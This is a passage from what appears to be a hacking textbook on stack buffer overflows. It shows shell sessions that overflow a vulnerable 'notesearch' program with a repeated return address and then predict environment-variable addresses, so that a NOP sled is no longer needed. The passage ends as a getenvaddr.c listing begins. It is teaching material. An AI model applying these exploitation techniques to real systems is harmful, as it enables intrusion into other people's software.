Graphics Programs Reference
In-Depth Information
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x46\xff\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $
In order to be able to predict an exact memory address, the differences
in the addresses must be explored. The length of the name of the program
being executed seems to have an effect on the address of the environment
variables. This effect can be further explored by changing the name of the
program and experimenting. This type of experimentation and pattern
recognition is an important skill for a hacker to have.
reader@hacking:~/booksrc $ cp a.out a
reader@hacking:~/booksrc $ ./a SLEDLESS
SLEDLESS is at 0xbfffff4e
reader@hacking:~/booksrc $ cp a.out bb
reader@hacking:~/booksrc $ ./bb SLEDLESS
SLEDLESS is at 0xbfffff4c
reader@hacking:~/booksrc $ cp a.out ccc
reader@hacking:~/booksrc $ ./ccc SLEDLESS
SLEDLESS is at 0xbfffff4a
reader@hacking:~/booksrc $ ./a.out SLEDLESS
SLEDLESS is at 0xbfffff46
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfffff4e - 0xbfffff46
$1 = 8
(gdb) quit
reader@hacking:~/booksrc $
As the preceding experiment shows, the length of the name of the execut-
ing program has an effect on the location of exported environment variables.
The general trend seems to be a decrease of two bytes in the address of the
environment variable for every single-byte increase in the length of the pro-
gram name. This holds true with the program name
a.out
, since the differ-
ence in length between the names
a.out
and
a
is four bytes, and the difference
between the address
0xbfffff4e
and
0xbfffff46
is eight bytes. This must mean
the name of the executing program is also located on the stack somewhere,
which is causing the shifting.
Armed with this knowledge, the exact address of the environment vari-
able can be predicted when the vulnerable program is executed. This means
the crutch of a NOP sled can be eliminated. The getenvaddr.c program
adjusts the address based on the difference in program name length to provide
a very accurate prediction.
getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
